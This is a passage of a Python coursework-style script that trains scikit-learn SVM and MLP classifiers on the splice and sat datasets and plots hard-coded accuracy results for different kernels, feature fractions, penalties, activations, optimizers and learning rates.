from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.decomposition import PCA
from sklearn.feature_selection import SelectKBest, f_classif, chi2, f_regression
import numpy as np
import matplotlib.pyplot as plt
interval = 15
max_iter = 150
def pca(x):
model = PCA(n_components=9)
data = model.fit_transform(x)
print(model.explained_variance_ratio_.sum())
return data
#return x
def select(x, y):
selector = SelectKBest(score_func=f_classif, k=10)
real_features = selector.fit_transform(x, y)
#print(selector.scores_)
return real_features
################################### SVM Part #####################################
def svm(data_name):
# load data
x_tr = np.load('data/' + data_name + '_feature.npy')
y_tr = np.load('data/' + data_name + '_target.npy')
x_t = np.load('data/' + data_name + '.t_feature.npy')
y_t = np.load('data/' + data_name + '.t_target.npy')
if data_name == 'madelon':
scaler = StandardScaler()
scaler.fit(x_tr)
x_tr = scaler.transform(x_tr)
scaler.fit(x_t)
x_t = scaler.transform(x_t)
res_tr = []
res_t = []
# training stage
for i in range(interval, max_iter + 1, interval):
model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
max_iter=i, probability=False, shrinking=True,
tol=0.001, verbose=False, random_state=666)
model.fit(x_tr, y_tr)
res_tr.append(round(model.score(x_tr, y_tr), 3))
res_t.append(round(model.score(x_t, y_t), 3))
# print(model.score(x_tr, y_tr))
# print(model.score(x_t, y_t))
# print(model.predict(x_tr))
print('train: ', res_tr)
print('test: ', res_t)
def plot_s_kernel_splice():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='linear',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_linear = [0.612, 0.598, 0.633, 0.547, 0.577, 0.599, 0.645, 0.558, 0.589, 0.607]
y_tr_poly3 = [0.579, 0.67, 0.718, 0.725, 0.739, 0.767, 0.798, 0.834, 0.864, 0.848]
y_tr_rbf = [0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998]
y_tr_sigmoid = [0.498, 0.489, 0.488, 0.488, 0.491, 0.491, 0.492, 0.492, 0.492, 0.491]
y_t_linear = [0.63, 0.583, 0.65, 0.556, 0.575, 0.589, 0.656, 0.558, 0.62, 0.594]
y_t_poly3 = [0.559, 0.694, 0.69, 0.695, 0.733, 0.73, 0.732, 0.781, 0.798, 0.793]
y_t_rbf = [0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887]
y_t_sigmoid = [0.475, 0.456, 0.453, 0.455, 0.456, 0.456, 0.457, 0.457, 0.457, 0.459]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_linear, color='#90EE90', linewidth=1.7, label='no kernel')
ax.plot(x, y_tr_poly3, color='#ffa07a', linewidth=1.7, label='3-polynomial')
ax.plot(x, y_tr_rbf, color='#9999ff', linewidth=1.7, label='rbf')
ax.plot(x, y_tr_sigmoid, color='#F0E68C', linewidth=1.7, label='sigmoid')
ax.scatter(x, y_tr_linear, s=13, c='#90EE90')
ax.scatter(x, y_tr_poly3, s=13, c='#ffa07a')
ax.scatter(x, y_tr_rbf, s=13, c='#9999ff')
ax.scatter(x, y_tr_sigmoid, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_kernel_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_linear, color='#90EE90', linewidth=1.7, label='no kernel')
ax.plot(x, y_t_poly3, color='#ffa07a', linewidth=1.7, label='3-polynomial')
ax.plot(x, y_t_rbf, color='#9999ff', linewidth=1.7, label='rbf')
ax.plot(x, y_t_sigmoid, color='#F0E68C', linewidth=1.7, label='sigmoid')
ax.scatter(x, y_t_linear, s=13, c='#90EE90')
ax.scatter(x, y_t_poly3, s=13, c='#ffa07a')
ax.scatter(x, y_t_rbf, s=13, c='#9999ff')
ax.scatter(x, y_t_sigmoid, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_kernel_splice_t')
plt.show()
def plot_s_kernel_sat():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='linear',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_linear = [0.633, 0.726, 0.801, 0.655, 0.665, 0.808, 0.833, 0.826, 0.853, 0.857]
y_tr_poly3 = [0.642, 0.664, 0.658, 0.638, 0.651, 0.661, 0.664, 0.693, 0.68, 0.644]
y_tr_rbf = [0.688, 0.685, 0.676, 0.715, 0.582, 0.624, 0.783, 0.823, 0.826, 0.828]
y_tr_sigmoid = [0.657, 0.706, 0.647, 0.681, 0.679, 0.648, 0.683, 0.776, 0.78, 0.798]
y_t_linear = [0.56, 0.673, 0.776, 0.662, 0.684, 0.78, 0.796, 0.796, 0.806, 0.825]
y_t_poly3 = [0.632, 0.656, 0.652, 0.644, 0.652, 0.66, 0.666, 0.688, 0.674, 0.657]
y_t_rbf = [0.664, 0.682, 0.656, 0.707, 0.608, 0.63, 0.764, 0.795, 0.798, 0.804]
y_t_sigmoid = [0.659, 0.696, 0.646, 0.674, 0.688, 0.666, 0.688, 0.749, 0.748, 0.764]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_linear, color='#90EE90', linewidth=1.7, label='no kernel')
ax.plot(x, y_tr_poly3, color='#ffa07a', linewidth=1.7, label='3-polynomial')
ax.plot(x, y_tr_rbf, color='#9999ff', linewidth=1.7, label='rbf')
ax.plot(x, y_tr_sigmoid, color='#F0E68C', linewidth=1.7, label='sigmoid')
ax.scatter(x, y_tr_linear, s=13, c='#90EE90')
ax.scatter(x, y_tr_poly3, s=13, c='#ffa07a')
ax.scatter(x, y_tr_rbf, s=13, c='#9999ff')
ax.scatter(x, y_tr_sigmoid, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_kernel_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_linear, color='#90EE90', linewidth=1.7, label='no kernel')
ax.plot(x, y_t_poly3, color='#ffa07a', linewidth=1.7, label='3-polynomial')
ax.plot(x, y_t_rbf, color='#9999ff', linewidth=1.7, label='rbf')
ax.plot(x, y_t_sigmoid, color='#F0E68C', linewidth=1.7, label='sigmoid')
ax.scatter(x, y_t_linear, s=13, c='#90EE90')
ax.scatter(x, y_t_poly3, s=13, c='#ffa07a')
ax.scatter(x, y_t_rbf, s=13, c='#9999ff')
ax.scatter(x, y_t_sigmoid, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_kernel_sat_t')
plt.show()
# poly kernel results: kernel_num (2-10)
# splice: tr:[0.852, 0.947, 0.983, 0.99, 0.99, 0.993, 0.99, 0.989, 0.983]
# t:[0.786, 0.857, 0.865, 0.871, 0.88, 0.874, 0.864, 0.867, 0.851]
# sat: tr:[0.651, 0.672, 0.492, 0.553, 0.475, 0.511, 0.471, 0.524, 0.373]
# t:[0.635, 0.666, 0.505, 0.554, 0.488, 0.512, 0.477, 0.528, 0.403]
def plot_s_dim_splice():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_25_tr = [0.615, 0.75, 0.749, 0.831, 0.853, 0.855, 0.891, 0.942, 0.965, 0.97]
y_5_tr = [0.754, 0.762, 0.798, 0.812, 0.867, 0.889, 0.921, 0.966, 0.969, 0.997]
y_75_tr = [0.67, 0.7, 0.816, 0.846, 0.874, 0.922, 0.941, 0.966, 0.989, 0.997]
y_tr = [0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998]
y_25_t = [0.635, 0.571, 0.567, 0.556, 0.585, 0.569, 0.569, 0.573, 0.603, 0.601]
y_5_t = [0.591, 0.547, 0.56, 0.585, 0.586, 0.587, 0.587, 0.598, 0.61, 0.585]
y_75_t = [0.51, 0.55, 0.584, 0.55, 0.581, 0.645, 0.583, 0.612, 0.637, 0.626]
y_t = [0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_tr, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_tr, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_tr, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_tr, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_tr, s=13, c='#90EE90')
ax.scatter(x, y_5_tr, s=13, c='#ffa07a')
ax.scatter(x, y_75_tr, s=13, c='#9999ff')
ax.scatter(x, y_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_dim_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_t, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_t, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_t, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_t, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_t, s=13, c='#90EE90')
ax.scatter(x, y_5_t, s=13, c='#ffa07a')
ax.scatter(x, y_75_t, s=13, c='#9999ff')
ax.scatter(x, y_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_dim_splice_t')
plt.show()
def plot_s_dim_sat():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_25_tr = [0.617, 0.534, 0.558, 0.732, 0.674, 0.766, 0.764, 0.773, 0.797, 0.806]
y_5_tr = [0.661, 0.75, 0.749, 0.704, 0.736, 0.819, 0.802, 0.725, 0.809, 0.846]
y_75_tr = [0.709, 0.576, 0.651, 0.803, 0.733, 0.825, 0.811, 0.84, 0.859, 0.835]
y_tr = [0.633, 0.726, 0.801, 0.655, 0.665, 0.808, 0.833, 0.826, 0.853, 0.857]
y_25_t = [0.489, 0.502, 0.453, 0.496, 0.554, 0.56, 0.536, 0.652, 0.668, 0.663]
y_5_t = [0.585, 0.616, 0.515, 0.571, 0.558, 0.648, 0.622, 0.59, 0.632, 0.658]
y_75_t = [0.564, 0.426, 0.442, 0.619, 0.487, 0.648, 0.62, 0.648, 0.659, 0.655]
y_t = [0.56, 0.673, 0.776, 0.662, 0.684, 0.78, 0.796, 0.796, 0.806, 0.825]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_tr, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_tr, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_tr, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_tr, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_tr, s=13, c='#90EE90')
ax.scatter(x, y_5_tr, s=13, c='#ffa07a')
ax.scatter(x, y_75_tr, s=13, c='#9999ff')
ax.scatter(x, y_tr, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_dim_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_25_t, color='#90EE90', linewidth=1.7, label='25% features')
ax.plot(x, y_5_t, color='#ffa07a', linewidth=1.7, label='50% features')
ax.plot(x, y_75_t, color='#9999ff', linewidth=1.7, label='75% features')
ax.plot(x, y_t, color='#F0E68C', linewidth=1.7, label='100% features')
ax.scatter(x, y_25_t, s=13, c='#90EE90')
ax.scatter(x, y_5_t, s=13, c='#ffa07a')
ax.scatter(x, y_75_t, s=13, c='#9999ff')
ax.scatter(x, y_t, s=13, c='#F0E68C')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_dim_sat_t')
plt.show()
def plot_s_penalty_splice():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0]
y_tr = [0.853, 0.903, 0.961, 0.962, 0.962, 0.969, 0.99, 1.0, 1.0]
y_t = [0.736, 0.805, 0.874, 0.888, 0.893, 0.889, 0.897, 0.895, 0.897]
x_ax = np.arange(9) * 0.9
total_width, n = 0.75, 2
width = total_width / n
x_ax = x_ax - (total_width - width) / 2
plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
for x, y1, y2 in zip(x_ax, y_tr, y_t):
plt.text(x - 0.02, y1, '%.2f' % y1, ha='center', va='bottom')
plt.text(x + width + 0.075, y2, '%.2f' % y2, ha='center', va='bottom')
ax = plt.gca()
ax.set_xticks(x_ax + width / 2)
ax.set_xticklabels((0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0))
plt.xlabel('Penalty parameter')
plt.ylabel('Accuracy')
plt.ylim(0, 1.245)
plt.legend()
plt.savefig('report/img/svm_penalty_splice')
plt.show()
def plot_s_penalty_sat():
# model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
# decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
# max_iter=i, probability=False, shrinking=True,
# tol=0.001, verbose=False, random_state=666)
x = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0]
y_tr = [0.807, 0.829, 0.845, 0.854, 0.867, 0.87, 0.875, 0.88, 0.77]
y_t = [0.786, 0.808, 0.822, 0.826, 0.832, 0.832, 0.835, 0.829, 0.728]
x_ax = np.arange(9) * 0.9
total_width, n = 0.75, 2
width = total_width / n
x_ax = x_ax - (total_width - width) / 2
plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
for x, y1, y2 in zip(x_ax, y_tr, y_t):
plt.text(x - 0.04, y1, '%.2f' % y1, ha='center', va='bottom')
plt.text(x + width + 0.075, y2, '%.2f' % y2, ha='center', va='bottom')
ax = plt.gca()
ax.set_xticks(x_ax + width / 2)
ax.set_xticklabels((0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0))
plt.xlabel('Penalty parameter')
plt.ylabel('Accuracy')
plt.ylim(0, 1.1)
plt.legend()
plt.savefig('report/img/svm_penalty_sat')
plt.show()
def plot_s_baseline():
x = list(range(interval, max_iter + 1, interval))
y_tr_splice = [0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998]
y_tr_sat = [0.688, 0.685, 0.676, 0.715, 0.582, 0.624, 0.783, 0.823, 0.826, 0.828]
y_t_splice = [0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887]
y_t_sat = [0.664, 0.682, 0.656, 0.707, 0.608, 0.63, 0.764, 0.795, 0.798, 0.804]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_splice, color='#9999ff', linewidth=1.7, label='Training set')
ax.plot(x, y_t_splice, color='#ffa07a', linewidth=1.7, label='Testing set')
ax.scatter(x, y_tr_splice, s=13, c='#9999ff')
ax.scatter(x, y_t_splice, s=13, c='#ffa07a')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_baseline_splice')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_sat, color='#9999ff', linewidth=1.7, label='Training set')
ax.plot(x, y_t_sat, color='#ffa07a', linewidth=1.7, label='Testing set')
ax.scatter(x, y_tr_sat, s=13, c='#9999ff')
ax.scatter(x, y_t_sat, s=13, c='#ffa07a')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/svm_baseline_sat')
plt.show()
################################### SVM Part #####################################
################################### MLP Part #####################################
def mlp(data_name):
# load data
x_tr = np.load('data/' + data_name + '_feature.npy')
y_tr = np.load('data/' + data_name + '_target.npy')
x_t = np.load('data/' + data_name + '.t_feature.npy')
y_t = np.load('data/' + data_name + '.t_target.npy')
# training stage
res_tr = []
res_t = []
for i in range(interval, max_iter + 1, interval):
model = MLPClassifier(solver='adam', alpha=1e-3,
learning_rate_init=0.001, max_iter=i,
activation='relu',
hidden_layer_sizes=(100,), random_state=666)
model.fit(x_tr, y_tr)
res_tr.append(round(model.score(x_tr, y_tr), 3))
res_t.append(round(model.score(x_t, y_t), 3))
print('train: ', res_tr)
print('test: ', res_t)
def plot_activation_splice():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_relu = [0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921]
y_tr_logi = [0.517, 0.517, 0.721, 0.799, 0.819, 0.834, 0.845, 0.852, 0.857, 0.861]
y_tr_tanh = [0.65, 0.732, 0.793, 0.832, 0.863, 0.881, 0.905, 0.915, 0.929, 0.944]
y_t_relu = [0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883]
y_t_logi = [0.52, 0.52, 0.717, 0.835, 0.832, 0.827, 0.83, 0.834, 0.836, 0.839]
y_t_tanh = [0.646, 0.721, 0.777, 0.805, 0.817, 0.822, 0.832, 0.836, 0.84, 0.84]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_relu, color='#90EE90', linewidth=1.7, label='relu')
ax.plot(x, y_tr_logi, color='#ffa07a', linewidth=1.7, label='sigmoid')
ax.plot(x, y_tr_tanh, color='#9999ff', linewidth=1.7, label='tanh')
ax.scatter(x, y_tr_relu, s=13, c='#90EE90')
ax.scatter(x, y_tr_logi, s=13, c='#ffa07a')
ax.scatter(x, y_tr_tanh, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_activation_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_relu, color='#90EE90', linewidth=1.7, label='relu')
ax.plot(x, y_t_logi, color='#ffa07a', linewidth=1.7, label='sigmoid')
ax.plot(x, y_t_tanh, color='#9999ff', linewidth=1.7, label='tanh')
ax.scatter(x, y_t_relu, s=13, c='#90EE90')
ax.scatter(x, y_t_logi, s=13, c='#ffa07a')
ax.scatter(x, y_t_tanh, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_activation_splice_t')
plt.show()
def plot_activation_sat():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_relu = [0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866]
y_tr_logi = [0.099, 0.257, 0.419, 0.43, 0.412, 0.396, 0.394, 0.392, 0.39, 0.428]
y_tr_tanh = [0.476, 0.59, 0.588, 0.624, 0.614, 0.621, 0.629, 0.653, 0.776, 0.803]
y_t_relu = [0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814]
y_t_logi = [0.106, 0.198, 0.411, 0.421, 0.411, 0.406, 0.403, 0.401, 0.4, 0.452]
y_t_tanh = [0.436, 0.566, 0.574, 0.618, 0.605, 0.605, 0.608, 0.622, 0.718, 0.745]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_relu, color='#90EE90', linewidth=1.7, label='relu')
ax.plot(x, y_tr_logi, color='#ffa07a', linewidth=1.7, label='sigmoid')
ax.plot(x, y_tr_tanh, color='#9999ff', linewidth=1.7, label='tanh')
ax.scatter(x, y_tr_relu, s=13, c='#90EE90')
ax.scatter(x, y_tr_logi, s=13, c='#ffa07a')
ax.scatter(x, y_tr_tanh, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_activation_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_relu, color='#90EE90', linewidth=1.7, label='relu')
ax.plot(x, y_t_logi, color='#ffa07a', linewidth=1.7, label='sigmoid')
ax.plot(x, y_t_tanh, color='#9999ff', linewidth=1.7, label='tanh')
ax.scatter(x, y_t_relu, s=13, c='#90EE90')
ax.scatter(x, y_t_logi, s=13, c='#ffa07a')
ax.scatter(x, y_t_tanh, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_activation_sat_t')
plt.show()
def plot_optimizer_splice():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_lbfgs = [0.779, 0.847, 0.88, 0.913, 0.925, 0.943, 0.952, 0.963, 0.964, 0.97]
y_tr_sgd = [0.57, 0.63, 0.643, 0.673, 0.698, 0.723, 0.752, 0.761, 0.781, 0.796]
y_tr_adam = [0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921]
y_t_lbfgs = [0.794, 0.849, 0.848, 0.874, 0.878, 0.875, 0.873, 0.866, 0.857, 0.855]
y_t_sgd = [0.595, 0.637, 0.651, 0.671, 0.703, 0.724, 0.746, 0.76, 0.768, 0.788]
y_t_adam = [0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_lbfgs, color='#90EE90', linewidth=1.7, label='lbfgs')
ax.plot(x, y_tr_sgd, color='#ffa07a', linewidth=1.7, label='sgd')
ax.plot(x, y_tr_adam, color='#9999ff', linewidth=1.7, label='adam')
ax.scatter(x, y_tr_lbfgs, s=13, c='#90EE90')
ax.scatter(x, y_tr_sgd, s=13, c='#ffa07a')
ax.scatter(x, y_tr_adam, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_optimizer_splice_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_lbfgs, color='#90EE90', linewidth=1.7, label='lbfgs')
ax.plot(x, y_t_sgd, color='#ffa07a', linewidth=1.7, label='sgd')
ax.plot(x, y_t_adam, color='#9999ff', linewidth=1.7, label='adam')
ax.scatter(x, y_t_lbfgs, s=13, c='#90EE90')
ax.scatter(x, y_t_sgd, s=13, c='#ffa07a')
ax.scatter(x, y_t_adam, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_optimizer_splice_t')
plt.show()
def plot_optimizer_sat():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=i,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = list(range(interval, max_iter + 1, interval))
y_tr_lbfgs = [0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257]
y_tr_sgd = [0.099, 0.257, 0.257, 0.407, 0.434, 0.446, 0.458, 0.471, 0.485, 0.518]
y_tr_adam = [0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866]
y_t_lbfgs = [0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198]
y_t_sgd = [0.106, 0.198, 0.198, 0.397, 0.43, 0.444, 0.45, 0.463, 0.477, 0.508]
y_t_adam = [0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814]
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_tr_lbfgs, color='#90EE90', linewidth=1.7, label='lbfgs')
ax.plot(x, y_tr_sgd, color='#ffa07a', linewidth=1.7, label='sgd')
ax.plot(x, y_tr_adam, color='#9999ff', linewidth=1.7, label='adam')
ax.scatter(x, y_tr_lbfgs, s=13, c='#90EE90')
ax.scatter(x, y_tr_sgd, s=13, c='#ffa07a')
ax.scatter(x, y_tr_adam, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_optimizer_sat_tr')
plt.show()
plt.figure(figsize=(6, 4))
ax = plt.gca()
ax.plot(x, y_t_lbfgs, color='#90EE90', linewidth=1.7, label='lbfgs')
ax.plot(x, y_t_sgd, color='#ffa07a', linewidth=1.7, label='sgd')
ax.plot(x, y_t_adam, color='#9999ff', linewidth=1.7, label='adam')
ax.scatter(x, y_t_lbfgs, s=13, c='#90EE90')
ax.scatter(x, y_t_sgd, s=13, c='#ffa07a')
ax.scatter(x, y_t_adam, s=13, c='#9999ff')
ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
plt.xlabel('Iterations')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_optimizer_sat_t')
plt.show()
def plot_lr_splice():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=300,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = [0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1]
y_tr = [0.921, 0.937, 0.911, 0.832, 0.517, 0.517, 0.517]
y_t = [0.883, 0.888, 0.876, 0.833, 0.52, 0.52, 0.52]
x_ax = np.arange(7)
total_width, n = 0.75, 2
width = total_width / n
x_ax = x_ax - (total_width - width) / 2
plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
for x, y1, y2 in zip(x_ax, y_tr, y_t):
plt.text(x - 0.02, y1, '%.2f' % y1, ha='center', va='bottom')
plt.text(x + width + 0.05, y2, '%.2f' % y2, ha='center', va='bottom')
ax = plt.gca()
ax.set_xticks(x_ax + width / 2)
ax.set_xticklabels((0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1))
plt.xlabel('Learning rate')
plt.ylabel('Accuracy')
plt.legend()
plt.savefig('report/img/mlp_lr_splice')
plt.show()
def plot_lr_sat():
# model = MLPClassifier(solver='adam', alpha=1e-3,
# learning_rate_init=0.001, max_iter=300,
# activation='relu',
# hidden_layer_sizes=(10, 10, 2), random_state=666)
x = [0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1]
y_tr = [0.877, 0.875, 0.87, 0.832, 0.87, 0.862, 0.715]
y_t = [0.832, 0.818, 0.812, 0.833, 0.826, 0.817, 0.661]
x_ax = np.arange(7)
total_width, n = 0.75, 2
width = total_width / n
x_ax = x_ax - (total_width - width) / 2
plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
for x, y1, y2 in zip(x_ax, y_tr, y_t):
